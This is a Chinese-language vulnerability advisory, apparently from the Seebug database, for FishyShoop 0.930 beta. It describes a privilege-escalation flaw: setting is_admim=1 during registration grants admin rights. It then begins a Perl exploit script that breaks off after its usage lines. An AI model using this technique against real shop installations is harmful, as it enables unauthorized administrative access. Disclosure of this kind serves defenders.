FishyShoop非授权管理访问漏洞

2006-12-26T00:00:00
ID SSV:1031
Type seebug
Reporter Root
Modified 2006-12-26T00:00:00

Description

Fishyshoop是一款网上购物软件。

Fishyshoop在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞非授权获取服务的管理权限。

Fishyshoop的pages/register/register.php文件会获取每个POST变量并将变量值注入到同一名称字段下新的记录中。如果注册时is_admim变量被设置为1的话,则登录帐号就会在站点获得管理权限。

FishyShoop FishyShoop 0.930 beta 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href="http://www.fishyshoop.com/" target="_blank">http://www.fishyshoop.com/</a>

                                        
                                            
                                                #!/usr/bin/perl

use WWW::Curl::Easy;

sub usage() {
  print &quot;$0 &lt;Fishyshoop root URL&gt; &lt;Desired E-Mail&gt; &lt;Desired Password&gt;\n&quot;;
  exit();
}

$FSURL=shift or usa